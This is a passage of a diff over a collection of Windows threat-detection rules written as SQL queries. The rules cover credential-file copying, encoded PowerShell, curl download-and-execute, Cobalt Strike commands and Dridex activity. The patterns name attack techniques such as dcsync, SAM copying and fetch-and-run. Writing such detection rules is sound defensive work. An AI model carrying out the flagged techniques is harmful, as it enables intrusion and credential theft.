'%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": 